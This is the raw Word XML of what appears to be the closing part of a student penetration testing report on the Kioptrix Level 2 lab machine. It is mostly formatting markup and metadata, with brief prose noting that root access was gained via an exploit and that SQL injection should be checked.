        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00336EB6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> user and by using exploit we were able to download and install it to gain root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317EBDEF" w14:textId="130A4255" w:rsidR="00336EB6" w:rsidRDefault="00336EB6" w:rsidP="00421A75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQL Injection is a critical vulnerability identified in almost every year in OWASP Top 10 hence machines should be checked with SQL Injection as this vulnerability can be</w:t>
      </w:r>
      <w:r w:rsidR="00564015">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> cause dump of full database even.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F16FAC" w14:textId="77777777" w:rsidR="00583185" w:rsidRPr="002A04D8" w:rsidRDefault="00583185" w:rsidP="00421A75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00583185" w:rsidRPr="002A04D8" w:rsidSect="00582ABF"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9048" w14:textId="77777777" w:rsidR="00582ABF" w:rsidRDefault="00582ABF" w:rsidP="00F14D51">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4E6141DC" w14:textId="77777777" w:rsidR="00582ABF" w:rsidRDefault="00582ABF" w:rsidP="00F1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CCF9" w14:textId="77777777" w:rsidR="00E67EAB" w:rsidRDefault="00E6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9031" w14:textId="77777777" w:rsidR="00582ABF" w:rsidRDefault="00582ABF" w:rsidP="00F14D51">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="65300D50" w14:textId="77777777" w:rsidR="00582ABF" w:rsidRDefault="00582ABF" w:rsidP="00F1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2A86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F0CA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D12367"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F536DAE8"/>
    <w:lvl w:ilvl="0" w:tplc="BC28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B7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ADF89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B371DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1A2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637078DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="13E8F0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28872099">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="605387732">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="331181302">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2130665975">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="152961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34"/>
    <w:rsid w:val="0001238C"/>
    <w:rsid w:val="00037DD5"/>
    <w:rsid w:val="00044CE2"/>
    <w:rsid w:val="00071D13"/>
    <w:rsid w:val="000813B6"/>
    <w:rsid w:val="00081B23"/>
    <w:rsid w:val="00083BAD"/>
    <w:rsid w:val="000D37AA"/>
    <w:rsid w:val="000E7F21"/>
    <w:rsid w:val="000F73F8"/>
    <w:rsid w:val="00110504"/>
    <w:rsid w:val="00130D1C"/>
    <w:rsid w:val="001318C2"/>
    <w:rsid w:val="00157666"/>
    <w:rsid w:val="00174DAC"/>
    <w:rsid w:val="001C7046"/>
    <w:rsid w:val="00255470"/>
    <w:rsid w:val="00263DC5"/>
    <w:rsid w:val="00295496"/>
    <w:rsid w:val="002A04D8"/>
    <w:rsid w:val="002F5585"/>
    <w:rsid w:val="003039DB"/>
    <w:rsid w:val="00306194"/>
    <w:rsid w:val="003102FA"/>
    <w:rsid w:val="003209DB"/>
    <w:rsid w:val="00321308"/>
    <w:rsid w:val="00336EB6"/>
    <w:rsid w:val="003B2088"/>
    <w:rsid w:val="003D1508"/>
    <w:rsid w:val="003F0C62"/>
    <w:rsid w:val="00421A75"/>
    <w:rsid w:val="00451373"/>
    <w:rsid w:val="004561F3"/>
    <w:rsid w:val="00476234"/>
    <w:rsid w:val="00487E91"/>
    <w:rsid w:val="004A59CC"/>
    <w:rsid w:val="004D3C03"/>
    <w:rsid w:val="004F0896"/>
    <w:rsid w:val="005069EC"/>
    <w:rsid w:val="00512225"/>
    <w:rsid w:val="00537362"/>
    <w:rsid w:val="00555953"/>
    <w:rsid w:val="00561A40"/>
    <w:rsid w:val="00564015"/>
    <w:rsid w:val="00577E25"/>
    <w:rsid w:val="00582ABF"/>
    <w:rsid w:val="00583185"/>
    <w:rsid w:val="00585505"/>
    <w:rsid w:val="005A348E"/>
    <w:rsid w:val="00646308"/>
    <w:rsid w:val="00646893"/>
    <w:rsid w:val="00673314"/>
    <w:rsid w:val="00706C20"/>
    <w:rsid w:val="00716CD0"/>
    <w:rsid w:val="007322D0"/>
    <w:rsid w:val="007463D4"/>
    <w:rsid w:val="007C6160"/>
    <w:rsid w:val="00833A5E"/>
    <w:rsid w:val="00842C01"/>
    <w:rsid w:val="008877EA"/>
    <w:rsid w:val="00887EAE"/>
    <w:rsid w:val="008A4F0C"/>
    <w:rsid w:val="008C50DB"/>
    <w:rsid w:val="008C6C96"/>
    <w:rsid w:val="008E0CB7"/>
    <w:rsid w:val="008F20AD"/>
    <w:rsid w:val="00900E4D"/>
    <w:rsid w:val="00926C8F"/>
    <w:rsid w:val="00942BE1"/>
    <w:rsid w:val="009B58C0"/>
    <w:rsid w:val="009C6B62"/>
    <w:rsid w:val="009F0ECE"/>
    <w:rsid w:val="00A11CEC"/>
    <w:rsid w:val="00A91C09"/>
    <w:rsid w:val="00AC4344"/>
    <w:rsid w:val="00AC5DB0"/>
    <w:rsid w:val="00AE38E3"/>
    <w:rsid w:val="00AF22C4"/>
    <w:rsid w:val="00B02ED9"/>
    <w:rsid w:val="00B066B9"/>
    <w:rsid w:val="00B11AC8"/>
    <w:rsid w:val="00B177CA"/>
    <w:rsid w:val="00B2627E"/>
    <w:rsid w:val="00B47B9E"/>
    <w:rsid w:val="00B5257D"/>
    <w:rsid w:val="00B90958"/>
    <w:rsid w:val="00BB02DE"/>
    <w:rsid w:val="00BB1DCA"/>
    <w:rsid w:val="00BC6CF3"/>
    <w:rsid w:val="00BF65A4"/>
    <w:rsid w:val="00C31873"/>
    <w:rsid w:val="00C74136"/>
    <w:rsid w:val="00CA4635"/>
    <w:rsid w:val="00CD6053"/>
    <w:rsid w:val="00CE06A2"/>
    <w:rsid w:val="00D54EC1"/>
    <w:rsid w:val="00DA5B62"/>
    <w:rsid w:val="00DE5F90"/>
    <w:rsid w:val="00DF1D42"/>
    <w:rsid w:val="00DF4E45"/>
    <w:rsid w:val="00DF71A7"/>
    <w:rsid w:val="00E0723C"/>
    <w:rsid w:val="00E33384"/>
    <w:rsid w:val="00E67EAB"/>
    <w:rsid w:val="00E713D8"/>
    <w:rsid w:val="00EC3BA5"/>
    <w:rsid w:val="00EE5320"/>
    <w:rsid w:val="00F0581B"/>
    <w:rsid w:val="00F14D51"/>
    <w:rsid w:val="00F42B16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D6944"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A73B96C9-C778-4A22-A750-ADD1C30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51"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F1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51"/>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001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C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74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4D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4D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DA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1222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2225"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="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E713D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20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vulnhub.com/kioptrix/Kioptrix_Level_2-update.ra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li.org/get-kali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vmware.com/in/products/workstation-pro/workstation-pro-evaluation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ownload.vulnhub.com/kioptrix/Kioptrix_Level_2-update.ra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192.168.1.2/index.php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17043-23E4-4D9D-89DC-B7B3E78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1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optrix level 2</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Prepared for: - COL Delhi University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optrix level 2</dc:title>
  <dc:subject>Penetration Testing Report</dc:subject>
  <dc:creator>Prateek Sharma</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Prateek Sharma</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-09T13:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-24T19:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>